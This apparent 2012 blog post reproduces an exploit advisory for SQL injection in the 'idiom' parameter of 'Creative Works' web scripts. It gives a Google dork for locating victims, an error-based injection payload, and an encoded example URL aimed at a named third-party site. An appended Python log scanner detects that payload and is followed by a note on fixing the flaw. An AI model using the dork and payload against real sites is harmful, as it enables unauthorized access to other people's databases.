Thursday, May 10, 2012
Creative Works full SQL injection bug
# Exploit Title: Creative Works Multiple sql web scripts
# Google Dork: Powered by: Creative Works
# Date: 10-05-2012
# Author: sh3ll0n sewate.net
# Software Link: www.creativeworks.com.ec
# Version: 2012
# Tested on: linux and windows any os
# Credits: Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/
Description:
The idiom parameter of index.php (index.php?idiom=) is vulnerable to SQL injection.
Tool: sqlmap was used to test the SQL bug.
Injection test payload: idiom=1 AND (SELECT 2358 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT (CASE WHEN (2358=2358) THEN 1 ELSE 0 END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Example:
http://www.hotelesecuador.com.ec/index.php?idiom=1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
Credits: cr0n0x of Security Warriors Team SWT
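
A log-scanning check for the request described above, added here as an example and not part of the original advisory: it flags non-numeric `idiom` values in web access logs and tags those that match the error-based payload quoted in the post. The log lines, the numeric allowlist for `idiom`, and all function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based payload quoted in the advisory.
MARKERS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"information_schema\.", re.I),
    re.compile(r"concat\s*\(\s*char\s*\(", re.I),
    re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_idiom(value):
    """Return 'ok', 'non_numeric' or 'sqli_error_based' for one idiom value."""
    # Assumption: a legitimate idiom is a short numeric language id (page shows 1).
    if re.fullmatch(r"\d{1,4}", value):
        return "ok"
    hits = sum(1 for marker in MARKERS if marker.search(value))
    return "sqli_error_based" if hits >= 2 else "non_numeric"

def scan_log(lines, param="idiom"):
    """Return (line_no, client_ip, verdict) for every suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes the value, so %20-encoded payloads match too.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in params.get(param, []):
            verdict = classify_idiom(value)
            if verdict != "ok":
                findings.append((line_no, line.split()[0], verdict))
    return findings

# Constructed access-log lines; the second carries the payload from the advisory.
PAYLOAD = ("1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,121,118,106,58),"
           "(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),"
           "CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x%20FROM%20"
           "INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)")
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2012:10:00:01 +0000] "GET /index.php?idiom=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2012:10:00:05 +0000] "GET /index.php?idiom=' + PAYLOAD + ' HTTP/1.1" 200 312',
    '192.0.2.44 - - [10/May/2012:10:00:09 +0000] "GET /index.php?idiom=1%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same numeric allowlist, enforced server-side before the value reaches the query and combined with a parameterized statement, removes the injection point that the detector only reports.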